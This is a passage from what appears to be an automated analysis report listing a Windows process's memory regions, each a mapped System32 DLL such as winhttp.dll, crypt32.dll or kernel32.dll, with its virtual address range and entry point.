"\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1881 start_va = 0x7ffc55280000 end_va = 0x7ffc5529efff monitored = 0 entry_point = 0x7ffc55284960 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 1882 start_va = 0x7ffc55360000 end_va = 0x7ffc55378fff monitored = 0 entry_point = 0x7ffc55364520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1883 start_va = 0x7ffc55820000 end_va = 0x7ffc55857fff monitored = 0 entry_point = 0x7ffc55838cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1884 start_va = 0x7ffc55860000 end_va = 0x7ffc5586afff monitored = 0 entry_point = 0x7ffc55861d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1885 start_va = 0x7ffc55c60000 end_va = 0x7ffc55fe1fff monitored = 0 entry_point = 0x7ffc55cb1220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1886 start_va = 0x7ffc570e0000 end_va = 0x7ffc571edfff monitored = 0 entry_point = 0x7ffc5712eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 1887 start_va = 0x7ffc574f0000 end_va = 0x7ffc57506fff monitored = 0 entry_point = 0x7ffc574f5630 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 1888 start_va = 0x7ffc57570000 end_va = 0x7ffc57582fff monitored = 0 entry_point = 0x7ffc575757f0 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 1889 start_va = 0x7ffc57590000 end_va = 0x7ffc57609fff monitored = 0 entry_point = 0x7ffc575b7630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1890 start_va = 0x7ffc57620000 end_va = 0x7ffc5764dfff monitored = 0 entry_point = 0x7ffc57627550 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 1891 start_va = 0x7ffc57650000 end_va = 0x7ffc57665fff monitored = 0 entry_point = 0x7ffc57651b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1892 start_va = 0x7ffc57670000 end_va = 0x7ffc576d3fff monitored = 0 entry_point = 0x7ffc57685ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1893 start_va = 0x7ffc578a0000 end_va = 0x7ffc5794dfff monitored = 0 entry_point = 0x7ffc578b80c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 1894 start_va = 0x7ffc57950000 end_va = 0x7ffc57961fff monitored = 0 entry_point = 0x7ffc57959260 region_type = mapped_file name = "rilproxy.dll" filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll") Region: id = 1895 start_va = 0x7ffc57970000 end_va = 0x7ffc57a20fff monitored = 0 entry_point = 0x7ffc579e88b0 region_type = mapped_file name = "cellularapi.dll" filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll") Region: id = 1896 start_va = 0x7ffc57a30000 end_va = 0x7ffc57a54fff monitored = 0 entry_point = 0x7ffc57a42f20 region_type = mapped_file name = "wificonnapi.dll" filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll") Region: id = 1897 start_va = 0x7ffc57a60000 end_va = 0x7ffc57a70fff monitored = 0 entry_point = 0x7ffc57a67ea0 region_type = mapped_file name = "dcpapi.dll" filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll") Region: id = 1898 start_va = 0x7ffc57a80000 end_va = 0x7ffc57a99fff monitored = 0 entry_point = 0x7ffc57a82cf0 region_type = mapped_file name = "locationpelegacywinlocation.dll" filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll") Region: id = 1899 start_va = 0x7ffc57aa0000 end_va = 0x7ffc57af4fff monitored = 0 entry_point = 0x7ffc57aa3fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 1900 start_va = 0x7ffc57b00000 end_va = 0x7ffc57b36fff monitored = 0 entry_point = 0x7ffc57b06020 region_type = mapped_file name = "gnssadapter.dll" filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll") Region: id = 1901 start_va = 0x7ffc57b40000 end_va = 0x7ffc57b5ffff monitored = 0 entry_point = 0x7ffc57b439a0 region_type = mapped_file name = "locationwinpalmisc.dll" filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll") Region: id = 1902 start_va = 0x7ffc57b60000 end_va = 0x7ffc57ba0fff monitored = 0 entry_point = 0x7ffc57b64840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 1903 start_va = 0x7ffc57bb0000 end_va = 0x7ffc57ce5fff monitored = 0 entry_point = 0x7ffc57bdf350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 1904 start_va = 0x7ffc57cf0000 end_va = 0x7ffc57dd5fff monitored = 0 entry_point = 0x7ffc57d0cf10 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 1905 start_va = 0x7ffc57de0000 end_va = 0x7ffc57debfff monitored = 0 entry_point = 0x7ffc57de14d0 region_type = mapped_file name = "locationframeworkps.dll" filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll") Region: id = 1906 start_va = 0x7ffc57df0000 end_va = 0x7ffc57dfbfff monitored = 0 entry_point = 0x7ffc57df2830 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 1907 start_va = 0x7ffc57e00000 end_va = 0x7ffc57e3dfff monitored = 0 entry_point = 0x7ffc57e0a050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1908 start_va = 0x7ffc57e40000 end_va = 0x7ffc57e66fff monitored = 0 entry_point = 0x7ffc57e43bf0 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 1909 start_va = 0x7ffc57e70000 end_va = 0x7ffc57f37fff monitored = 0 entry_point = 0x7ffc57eb13f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1910 start_va = 0x7ffc57f40000 end_va = 0x7ffc57fa0fff monitored = 0 entry_point = 0x7ffc57f44b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 1911 start_va = 0x7ffc57fb0000 end_va = 0x7ffc5812bfff monitored = 0 entry_point = 0x7ffc58001650 region_type = mapped_file name = "locationframework.dll" filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll") Region: id = 1912 start_va = 0x7ffc58130000 end_va = 0x7ffc5813afff monitored = 0 entry_point = 0x7ffc58131770 region_type = mapped_file name = "lfsvc.dll" filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll") Region: id = 1913 start_va = 0x7ffc58140000 end_va = 0x7ffc58194fff monitored = 0 entry_point = 0x7ffc5814fc00 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 1914 start_va = 0x7ffc58230000 end_va = 0x7ffc582c1fff monitored = 0 entry_point = 0x7ffc5827a780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 1915 start_va = 0x7ffc58350000 end_va = 0x7ffc5835cfff monitored = 0 entry_point = 0x7ffc58352ca0 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 1916 start_va = 0x7ffc58360000 end_va = 0x7ffc58388fff monitored = 0 entry_point = 0x7ffc5836ca00 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 1917 start_va = 0x7ffc58b50000 end_va = 0x7ffc58b7efff monitored = 0 entry_point = 0x7ffc58b58910 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 1918 start_va = 0x7ffc58b80000 end_va = 0x7ffc58b8ffff monitored = 0 entry_point = 0x7ffc58b82c60 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 1919 start_va = 0x7ffc58c20000 end_va = 0x7ffc58c55fff monitored = 0 entry_point = 0x7ffc58c30070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1920 start_va = 0x7ffc58cd0000 end_va = 0x7ffc58d3dfff monitored = 0 entry_point = 0x7ffc58cd7f60 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 1921 start_va = 0x7ffc58d40000 end_va = 0x7ffc58d50fff monitored = 0 entry_point = 0x7ffc58d43320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 1922 start_va = 0x7ffc58d60000 end_va = 0x7ffc58da0fff monitored = 0 entry_point = 0x7ffc58d77eb0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 1923 start_va = 0x7ffc58db0000 end_va = 0x7ffc58eabfff monitored = 0 entry_point = 0x7ffc58de6df0 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 1924 start_va = 0x7ffc58eb0000 end_va = 0x7ffc58f6efff monitored = 0 entry_point = 0x7ffc58ed1c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 1925 start_va = 0x7ffc58fc0000 end_va = 0x7ffc58fc9fff monitored = 0 entry_point = 0x7ffc58fc1660 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1926 start_va = 0x7ffc58fd0000 end_va = 0x7ffc58fe7fff monitored = 0 entry_point = 0x7ffc58fd5910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1927 start_va = 0x7ffc58ff0000 end_va = 0x7ffc5913cfff monitored = 0 entry_point = 0x7ffc59033da0 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 1928 start_va = 0x7ffc59500000 end_va = 0x7ffc59992fff monitored = 0 entry_point = 0x7ffc5950f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1929 start_va = 0x7ffc599a0000 end_va = 0x7ffc59a06fff monitored = 0 entry_point = 0x7ffc599be710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 1930 start_va = 0x7ffc5a2c0000 end_va = 0x7ffc5a2d2fff monitored = 0 entry_point = 0x7ffc5a2c2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1931 start_va = 0x7ffc5a2e0000 end_va = 0x7ffc5a358fff monitored = 0 entry_point = 0x7ffc5a2ffb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1932 start_va = 0x7ffc5a360000 end_va = 0x7ffc5a367fff monitored = 0 entry_point = 0x7ffc5a3613e0 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 1933 start_va = 0x7ffc5a3a0000 end_va = 0x7ffc5a525fff monitored = 0 entry_point = 0x7ffc5a3ed700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1934 start_va = 0x7ffc5a530000 end_va = 0x7ffc5a54bfff monitored = 0 entry_point = 0x7ffc5a5337a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1935 start_va = 0x7ffc5a6e0000 end_va = 0x7ffc5a71ffff monitored = 0 entry_point = 0x7ffc5a6f1960 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 1936 start_va = 0x7ffc5a7b0000 end_va = 0x7ffc5a845fff monitored = 0 entry_point = 0x7ffc5a7d5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1937 start_va = 0x7ffc5a850000 end_va = 0x7ffc5a876fff monitored = 0 entry_point = 0x7ffc5a857940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1938 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1939 start_va = 0x7ffc5a950000 end_va = 0x7ffc5aa4ffff monitored = 0 entry_point = 0x7ffc5a990f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 1940 start_va = 0x7ffc5aae0000 end_va = 0x7ffc5aaebfff monitored = 0 entry_point = 0x7ffc5aae2480 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 1941 start_va = 0x7ffc5abb0000 end_va = 0x7ffc5abe1fff monitored = 0 entry_point = 0x7ffc5abc2340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 1942 start_va = 0x7ffc5ae20000 end_va = 0x7ffc5ae2bfff monitored = 0 entry_point = 0x7ffc5ae22790 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 1943 start_va = 0x7ffc5ae30000 end_va = 0x7ffc5ae53fff monitored = 0 entry_point = 0x7ffc5ae33260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1944 start_va = 0x7ffc5afd0000 end_va = 0x7ffc5b0c3fff monitored = 0 entry_point = 0x7ffc5afda960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 1945 start_va = 0x7ffc5b120000 end_va = 0x7ffc5b168fff monitored = 0 entry_point = 0x7ffc5b12a090 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1946 start_va = 0x7ffc5b240000 end_va = 0x7ffc5b24bfff monitored = 0 entry_point = 0x7ffc5b2427e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1947 start_va = 0x7ffc5b320000 end_va = 0x7ffc5b350fff monitored = 0 entry_point = 0x7ffc5b327d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1948 start_va = 0x7ffc5b380000 end_va = 0x7ffc5b3f9fff monitored = 0 entry_point = 0x7ffc5b3a1a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1949 start_va = 0x7ffc5b440000 end_va = 0x7ffc5b473fff monitored = 0 entry_point = 0x7ffc5b45ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1950 start_va = 0x7ffc5b480000 end_va = 0x7ffc5b489fff monitored = 0 entry_point = 0x7ffc5b481830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 1951 start_va = 0x7ffc5b590000 end_va = 0x7ffc5b5aefff monitored = 0 entry_point = 0x7ffc5b595d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1952 start_va = 0x7ffc5b700000 end_va = 0x7ffc5b75bfff monitored = 0 entry_point = 0x7ffc5b716f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1953 start_va = 0x7ffc5b7b0000 end_va = 0x7ffc5b7c6fff monitored = 0 entry_point = 0x7ffc5b7b79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1954 start_va = 0x7ffc5b8d0000 end_va = 0x7ffc5b8dafff monitored = 0 entry_point = 0x7ffc5b8d19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1955 start_va = 0x7ffc5b910000 end_va = 0x7ffc5b930fff monitored = 0 entry_point = 0x7ffc5b920250 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 1956 start_va = 0x7ffc5b960000 end_va = 0x7ffc5b999fff monitored = 0 entry_point = 0x7ffc5b968d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 1957 start_va = 0x7ffc5b9a0000 end_va = 0x7ffc5b9c6fff monitored = 0 entry_point = 0x7ffc5b9b0aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 1958 start_va = 0x7ffc5bab0000 end_va = 0x7ffc5badcfff monitored = 0 entry_point = 0x7ffc5bac9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1959 start_va = 0x7ffc5bc40000 end_va = 0x7ffc5bc95fff monitored = 0 entry_point = 0x7ffc5bc50bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1960 start_va = 0x7ffc5bca0000 end_va = 0x7ffc5bcb8fff monitored = 0 entry_point = 0x7ffc5bca5e10 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 1961 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1962 start_va = 0x7ffc5bcf0000 end_va = 0x7ffc5bd88fff monitored = 0 entry_point = 0x7ffc5bd1f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1963 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1964 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1965 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1966 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1967 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1968 start_va = 0x7ffc5bf10000 end_va = 0x7ffc5bf95fff monitored = 0 entry_point = 0x7ffc5bf1d8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1969 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1970 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1971 start_va = 0x7ffc5c360000 end_va = 0x7ffc5c3b4fff monitored = 0 entry_point = 0x7ffc5c377970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1972 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1973 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1974 start_va = 0x7ffc5cb30000 end_va = 0x7ffc5cb46fff monitored = 0 entry_point = 0x7ffc5cb31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1975 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1976 start_va = 0x7ffc5cc10000 end_va = 0x7ffc5cc6bfff monitored = 0 entry_point = 0x7ffc5cc2b720 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1977 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1978 start_va = 0x7ffc5e1e0000 end_va = 0x7ffc5e2a0fff monitored = 0 entry_point = 0x7ffc5e200da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1979 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1980 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1981 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1982 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1983 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1984 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1985 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1986 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1987 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1988 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = 